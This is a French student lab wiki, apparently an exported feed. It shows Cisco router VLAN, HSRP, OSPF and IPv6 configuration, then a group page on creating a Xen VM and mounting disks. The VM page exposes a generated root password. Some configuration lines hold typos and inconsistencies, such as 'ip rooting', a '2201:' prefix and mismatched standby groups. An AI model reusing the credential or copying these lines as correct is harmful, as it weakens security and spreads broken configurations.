=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51398</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51398"/>
				<updated>2019-11-29T11:40:19Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Modification de /etc/bind/db.ima2a5-rex4ever.site */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
